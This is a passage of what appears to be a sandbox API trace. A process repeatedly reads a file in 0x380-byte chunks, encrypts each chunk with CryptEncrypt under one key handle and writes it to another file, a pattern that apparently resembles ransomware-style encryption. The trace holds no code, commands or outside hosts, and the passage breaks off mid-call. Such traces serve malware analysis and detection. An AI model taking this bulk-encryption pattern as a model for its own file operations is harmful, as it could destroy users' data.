hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.611] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.611] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.611] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.611] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.611] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.611] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.611] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.611] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.612] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.612] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.612] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.612] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.612] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.612] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.612] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.612] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.612] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.612] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.612] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.612] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.612] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.613] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.613] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.613] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.613] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.613] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.613] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.613] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.613] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.613] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.613] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.613] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.613] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.613] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.613] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.613] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.614] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.614] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.614] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.614] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.614] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.614] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.614] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.614] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.614] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.614] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.614] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.614] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.614] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.614] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.615] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.615] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.615] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.615] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.615] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.615] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.615] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.615] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.615] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.615] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.615] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.615] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.615] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.615] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.615] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.616] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.616] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.616] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.616] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.616] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.616] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.616] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.616] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.616] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.616] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.616] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.616] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.616] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.616] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.617] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.617] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.617] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.617] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.618] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.618] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.618] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.618] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.618] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.618] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.618] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.618] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.618] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.618] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.618] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.618] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.618] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.618] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, 